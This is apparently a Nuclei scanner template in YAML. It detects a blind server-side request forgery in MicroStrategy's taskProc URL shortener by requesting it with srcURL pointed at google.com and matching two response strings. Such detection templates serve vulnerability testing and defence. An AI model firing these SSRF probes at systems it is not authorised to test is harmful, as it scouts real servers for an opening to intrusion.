26 lines
833 B
YAML
26 lines
833 B
YAML
|
id: microstrategy-ssrf
|
||
|
|
||
|
info:
|
||
|
name: MicroStrategy tinyurl - Server-Side Request Forgery (Blind)
|
||
|
author: organiccrap
|
||
|
severity: high
|
||
|
description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener.
|
||
|
reference:
|
||
|
- https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
|
||
|
tags: microstrategy,ssrf
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
|
||
|
- '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
|
||
|
|
||
|
stop-at-first-match: true
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- taskResponse
|
||
|
- The source URL is not valid
|
||
|
condition: and
|
||
|
part: body
|